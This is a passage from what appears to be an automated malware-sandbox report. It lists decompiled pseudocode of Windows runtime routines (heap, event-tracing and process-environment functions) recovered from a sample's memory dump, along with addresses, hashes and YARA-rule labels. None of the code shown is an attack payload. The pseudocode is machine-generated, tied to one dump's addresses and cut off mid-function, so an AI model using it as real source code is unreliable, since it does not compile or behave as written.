												E01749B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0176D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1805388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x180538c = _t51;
						goto L6;
					}
				}
			}

0x01719082
0x01719083
0x01719084
0x01719085
0x01719087
0x01719096
0x01719098
0x01719098
0x0171909e
0x017190a8
0x017190e7
0x017190e7
0x017190aa
0x017190b0
0x017190b7
0x017190bd
0x017190dd
0x017190e6
0x017190bf
0x017190bf
0x017190c7
0x017190cf
0x017190f1
0x017190f2
0x017190f4
0x017190f5
0x017190f6
0x017190f7
0x017190f8
0x017190f9
0x017190fa
0x017190fb
0x017190fc
0x017190fd
0x017190fe
0x017190ff
0x01719100
0x01719102
0x01719107
0x0171910c
0x01719110
0x01719113
0x01719115
0x01719136
0x0171913f
0x01719143
0x017737e4
0x017737e4
0x01719117
0x01719117
0x0171911d
0x00000000
0x0171911f
0x0171911f
0x01719125
0x00000000
0x01719127
0x0171912d
0x01719130
0x01719134
0x01719158
0x0171915d
0x01719161
0x01719168
0x01773715
0x0171916e
0x0171916e
0x01719175
0x01719177
0x0171917e
0x0171917f
0x01719182
0x01719182
0x01719187
0x01719187
0x0171918a
0x0171918d
0x0171918f
0x01719192
0x01719195
0x01719198
0x01719198
0x01719198
0x0171919a
0x00000000
0x00000000
0x0177371f
0x01773721
0x01773727
0x0177372f
0x01773733
0x01773735
0x01773738
0x0177373b
0x0177373d
0x01773740
0x00000000
0x01773746
0x01773746
0x01773749
0x00000000
0x0177374f
0x0177374f
0x01773751
0x01773757
0x01773759
0x0177375c
0x0177375c
0x0177375e
0x0177375e
0x01773761
0x01773764
0x00000000
0x00000000
0x01773766
0x01773768
0x017737a3
0x017737a3
0x017737a5
0x017737a7
0x017737ad
0x017737b0
0x017737b2
0x017737bc
0x017737c2
0x017737c2
0x017737b2
0x01719187
0x01719187
0x0171918a
0x0171918d
0x0171918f
0x01719192
0x01719195
0x00000000
0x01719195
0x00000000
0x0177376a
0x0177376a
0x0177376a
0x0177376c
0x0177376c
0x0177376f
0x01773775
0x00000000
0x00000000
0x01773777
0x01773779
0x01773782
0x01773787
0x01773789
0x01773790
0x01773790
0x0177378b
0x0177378b
0x0177378b
0x01773792
0x01773795
0x00000000
0x01773795
0x00000000
0x01773779
0x01773798
0x00000000
0x01773798
0x00000000
0x01773768
0x0177379b
0x0177379b
0x01773751
0x01773749
0x00000000
0x01773740
0x017191a0
0x017191a3
0x017191a9
0x017191b0
0x00000000
0x017191b0
0x01719187
0x017191b4
0x017191b4
0x017191bb
0x017191c0
0x017191c5
0x017191c7
0x017737da
0x017191cd
0x017191cd
0x017191cd
0x017191d2
0x017191d5
0x01719239
0x01719239
0x017191d7
0x017191db
0x017191e1
0x017191e7
0x017191fd
0x01719203
0x0171921e
0x01719223
0x00000000
0x01719205
0x01719205
0x01719208
0x0171920c
0x01719214
0x01719214
0x0171920c
0x017191e9
0x017191e9
0x017191ee
0x017191f3
0x017191f3
0x017191f3
0x017191e7
0x00000000
0x00000000
0x00000000
0x01719134
0x01719125
0x0171911d
0x0171914e
0x017190d1
0x017190d1
0x017190d3
0x017190d6
0x017190d8
0x00000000
0x017190d8
0x017190cf

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4da83d3640af198fed85ca811aec6e2a01f6ade82e3305a095ae840d096a96
Instruction ID: 1b064e34968bd294fca6c9b7ec4a1b55e1139f353fc50a6853462005882ea302
Opcode Fuzzy Hash: ab4da83d3640af198fed85ca811aec6e2a01f6ade82e3305a095ae840d096a96
Instruction Fuzzy Hash: FF01D1725012098FC3268F0CD840B21BBA9EF86724F224066E205DB69AC270DD82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 017E4015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E017E4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01732280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01732280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18086ac);
					E0171F900(0x18086d4, _t28);
					L0172FFB0(0x18086ac, _t28, 0x18086ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					L0172FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x017e401a
0x017e401e
0x017e4023
0x017e4028
0x017e4029
0x017e402b
0x017e402f
0x017e4043
0x017e4046
0x017e4051
0x017e4057
0x017e405f
0x017e4062
0x017e4067
0x017e406f
0x017e407c
0x017e407c
0x017e408c
0x017e408c
0x017e4097

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26db83570f24be10a9d06d5d9058b57df82e037c0e15fdc51c52fe918419db86
Instruction ID: 667b7d0af72960e5e23cd0ec926f595b63266eafd81fcff49a9f1fe6145dcf08
Opcode Fuzzy Hash: 26db83570f24be10a9d06d5d9058b57df82e037c0e15fdc51c52fe918419db86
Instruction Fuzzy Hash: D801847160164A7FD251AB69CD88E13F7ACFB99650B010225F508C7A56CB24EC51CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 017D138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E017D138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x180d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0175FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01737D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L0175B640(E01759AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

0x017d138a
0x017d138a
0x017d1399
0x017d13a3
0x017d13a8
0x017d13aa
0x017d13b5
0x017d13bb
0x017d13c3
0x017d13c6
0x017d13c9
0x017d13d4
0x017d13e6
0x017d13d6
0x017d13df
0x017d13df
0x017d13f1
0x017d13f2
0x017d13f4
0x017d140e

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3b79cb43ef23b9d000f15b3f68e0c8b795ea91ba98a54d635aab1934ae1634
Instruction ID: a5e54acd4fb353fd63061cf7366368b47409ba6324ecf4eacc5d439ebabe1f3f
Opcode Fuzzy Hash: ef3b79cb43ef23b9d000f15b3f68e0c8b795ea91ba98a54d635aab1934ae1634
Instruction Fuzzy Hash: 54015271E0025DAFDB14DFA9D845EAEFBB8EF44710F404156F904EB280DA749A41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 017158EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E017158EC(void* __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				void* _t17;
				void* _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x180d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x16f5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01715943() != 0 &&  *0x1805320 > 5) {
					E01797B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01797B5E( &_v28, _t28);
					_t11 = E01797B9C(0x1805320, 0x16fbf15,  &_v28, _t22, 4,  &_v76);
				}
				return L0175B640(_t11, _t17, _v8 ^ _t29, 0x16fbf15, _t27, _t28);
			}

0x017158fb
0x017158fe
0x01715906
0x0171590a
0x0171593c
0x0171593c
0x0171590c
0x0171590c
0x01715911
0x00000000
0x01715913
0x01715913
0x01715913
0x01715911
0x0171591d
0x01771035
0x0177103c
0x0177103f
0x01771056
0x01771056
0x0171593b

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b2bbfa9876015e98bdfc7cc845b98cf96132545fd5a4100c8381e660fe525b
Instruction ID: 2c4e3b74464743438283c104914e4df808049b91bd3530e9543951c4cef7c171
Opcode Fuzzy Hash: 52b2bbfa9876015e98bdfc7cc845b98cf96132545fd5a4100c8381e660fe525b
Instruction Fuzzy Hash: 4801A731A101099BCB1CDE7DDC049AFF7A9EF82530F9501699A059724CDE30DD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 017E1074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E017E1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v11;
				unsigned int _v12;
				intOrPtr _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L017E165E(__ebx, 0x1808ae4, (__edx -  *0x1808b04 >> 0x14) + (__edx -  *0x1808b04 >> 0x14), __edi, __ecx, (__edx -  *0x1808b04 >> 0x14) + (__edx -  *0x1808b04 >> 0x14));
				}
				_push( *((intOrPtr*)(_t35 + 0x38)));
				_push( *((intOrPtr*)(_t35 + 0x34)));
				_push(0x8000);
				L017DAFDE( &_v8,  &_v12);
				if(E01737D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = L017CFE3F(_t22, _t35, _v11, _v15);
				}
				return _t16;
			}

0x017e1074
0x017e1080
0x017e1082
0x017e108a
0x017e108f
0x017e1093
0x017e10a8
0x017e10ab
0x017e10ab
0x017e10b0
0x017e10b7
0x017e10be
0x017e10c3
0x017e10cf
0x017e10e1
0x017e10d1
0x017e10da
0x017e10da
0x017e10e9
0x017e10f5
0x017e10f5
0x017e10fe

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7a700a87b6559f31fc00797ea2050ac43e9d5fae05b7d791bbcafc42488de1
Instruction ID: 9e66ca9bbedc37a2ed6e0a66ce591951a3071d11765fdccf00b6f70239c004e1
Opcode Fuzzy Hash: 4f7a700a87b6559f31fc00797ea2050ac43e9d5fae05b7d791bbcafc42488de1
Instruction Fuzzy Hash: 0F014C726047469FC711DF28C849B1AFBE5BBC8310F44C519F985C3694DE30D584CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0172B02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0172B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01737D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01797016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0172b037
0x0172b039
0x0172b03b
0x0172b040
0x0177a60e
0x00000000
0x00000000
0x0177a61d
0x0172b04b
0x0172b04e
0x0177a627
0x0177a634
0x00000000
0x00000000
0x0177a641
0x0177a653
0x0177a643
0x0177a64c
0x0177a64c
0x0177a65b
0x00000000
0x00000000
0x00000000
0x0177a66c
0x0172b057
0x0172b057
0x0172b057
0x0172b046
0x0172b046
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 7a7d3dafd3d0e65f89e5f44a0c30f51cdbb74f9169f495acedc15cc5a7ef0f2c
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: B1018472200584DFE737C75CC988F6ABBE8EB85750F0D00A1FA15CB651D728DC41C621

Uniqueness

Uniqueness Score: -1.00%

Function 017E8A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E017E8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x180d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01737D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L0175B640(E01759AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}

0x017e8a62
0x017e8a71
0x017e8a79
0x017e8a82
0x017e8a85
0x017e8a89
0x017e8a8c
0x017e8a8f
0x017e8a92
0x017e8a95
0x017e8a9f
0x017e8ab1
0x017e8aa1
0x017e8aaa
0x017e8aaa
0x017e8abc
0x017e8abd
0x017e8abf
0x017e8ada

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ced91871e3e7abdaec803fcd81072606da72e0719ef1f444c2b74e07481ebd
Instruction ID: bd114387036c7cb0ef952a2c4aeb6320dd241b7a89af88768334a2bdfdc96269
Opcode Fuzzy Hash: 90ced91871e3e7abdaec803fcd81072606da72e0719ef1f444c2b74e07481ebd
Instruction Fuzzy Hash: 9F012CB1A0021DAFCB04DFA9D9459AEFBF8EF58310F10405AFA04E7351E774AA00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0171DB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0171DB60(intOrPtr* __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *__ecx != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0171DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = L0171E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0171E8B0(__ecx, _t14, 0xfff);
							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0171db64
0x0171db66
0x0171db6b
0x0171dbaa
0x0171db71
0x0171db76
0x0171db7a
0x0171dba3
0x0171db7c
0x0171db87
0x0171db8b
0x01774fa1
0x01774fb3
0x01774fb8
0x0171db91
0x0171db96
0x0171db98
0x0171db98
0x0171db8b
0x0171db7a
0x0171db9d
0x0171dba2

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 5dd28bbcddf37735b4fa80aa8bc1cbb90cf7e85529b9e3c04e1d819a22edfab4
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 35F068732415239BD7375ADDC88CB67F696AFD1A60F150075B6069B24CCE6088029AD1

Uniqueness

Uniqueness Score: -1.00%

Function 0171B1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0171B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01737D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01737D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01797016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0171b1e8
0x0171b1ea
0x0171b1f3
0x01774a17
0x0171b1f9
0x0171b1f9
0x0171b1f9
0x0171b201
0x01774a21
0x01774a2e
0x00000000
0x00000000
0x01774a3b
0x01774a4d
0x01774a3d
0x01774a46
0x01774a46
0x01774a55
0x00000000
0x00000000
0x00000000
0x0171b20a
0x0171b20a
0x0171b20a
0x0171b20a

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: fdb5dde9d756f5abc2c8489373a60dba1ea5e822f4360d04cb2fbfeb65a5978c
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 9A01F432204684DBD726A76DC808FA9FBA8EF91750F0A00A1FA158B6B6E778C940C314

Uniqueness

Uniqueness Score: -1.00%

Function 017D131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E017D131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x180d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01737D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				return L0175B640(E01759AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}

0x017d131b
0x017d132a
0x017d1330
0x017d1336
0x017d133e
0x017d1341
0x017d1344
0x017d134f
0x017d1361
0x017d1351
0x017d135a
0x017d135a
0x017d136c
0x017d136d
0x017d136f
0x017d1387

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad14eb9656cf4a826954667948211a5a7bf54804ecdab47e6c88938df2f4763c
Instruction ID: 4e06d3d77500ba18e587884a18cb91f936b0ec87baa36301e89c3c10592c0641
Opcode Fuzzy Hash: ad14eb9656cf4a826954667948211a5a7bf54804ecdab47e6c88938df2f4763c
Instruction Fuzzy Hash: 070119B1A0120DAFCB44EFA9D549AAEB7F4EF58700F408059F905EB391EA749A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0173C577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0173C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || L0173C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16f11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E017E88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0173c577
0x0173c57d
0x0173c581
0x0173c5b5
0x0173c5b9
0x0173c5ce
0x0173c5ce
0x0173c5ca
0x00000000
0x0173c5ca
0x0173c5c4
0x0173c5c8
0x00000000
0x00000000
0x00000000
0x0173c5ad
0x00000000
0x0173c5af

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f103a9584ab05984124b7eb320dd9835554814a01c9daee5011a1f0a981d489
Instruction ID: be66a65faadaf8b35c4320e80a9446387b9931c042c4fec8e6fbec21d227e5c9
Opcode Fuzzy Hash: 8f103a9584ab05984124b7eb320dd9835554814a01c9daee5011a1f0a981d489
Instruction Fuzzy Hash: D0F024B28152908FE733EB1CC008B22FFD49B85370F7484A7D545A31C3C2A0C880C250

Uniqueness

Uniqueness Score: -1.00%

Function 017E8D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E017E8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				void* _t18;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x180d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01737D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				return L0175B640(E01759AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
			}

0x017e8d34
0x017e8d43
0x017e8d4b
0x017e8d4e
0x017e8d52
0x017e8d5c
0x017e8d6e
0x017e8d5e
0x017e8d67
0x017e8d67
0x017e8d79
0x017e8d7a
0x017e8d7c
0x017e8d94

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862b7327472d391b039525824099cd35d459a350464d7a2936181f3a9e091f50
Instruction ID: 069aafb4126890251afdd207db032f9dc9a946b432d711f0e56d781697a16c7c
Opcode Fuzzy Hash: 862b7327472d391b039525824099cd35d459a350464d7a2936181f3a9e091f50
Instruction Fuzzy Hash: 9DF0B470E0460C9FDB14EFB8D449A6EF7F4EF18300F508099E905EB291EA34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 017D2073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E017D2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E017CFD22(__ecx);
				_t19 =  *0x180849c - _t3; // 0x18e02eca
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1808748; // 0x0
					if(__eflags <= 0) {
						L017D1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1808724 & 0x00000004;
							if(( *0x1808724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1808724; // 0x0
					return E017C8DF1(__ebx, 0xc0000374, 0x1805890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x017d2076
0x017d2078
0x017d207d
0x017d2083
0x017d20a4
0x017d20aa
0x017d20ac
0x017d20b7
0x017d20ba
0x017d20bc
0x017d20c9
0x017d20c9
0x017d20d0
0x017d20d2
0x00000000
0x017d20d2
0x017d20be
0x017d20c3
0x017d20c5
0x017d20c7
0x00000000
0x00000000
0x017d20c7
0x017d20bc
0x017d20d4
0x017d2085
0x017d2085
0x017d20a3
0x017d20a3

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aba924fbcc523346adb9c03007531214d11f8ccfd8aa278e6e9821885a4caa6
Instruction ID: 1253dff91a9d9192d70d6ca454d3abb63dd5e6f14a9dd076093f35c714a79908
Opcode Fuzzy Hash: 1aba924fbcc523346adb9c03007531214d11f8ccfd8aa278e6e9821885a4caa6
Instruction Fuzzy Hash: C2F0A02A81618D4ADFB36B2865152E2ABE6D756210B0E1489D9906760EC534CAD3CF25

Uniqueness

Uniqueness Score: -1.00%

Function 0175927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0175927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01734620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0175FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
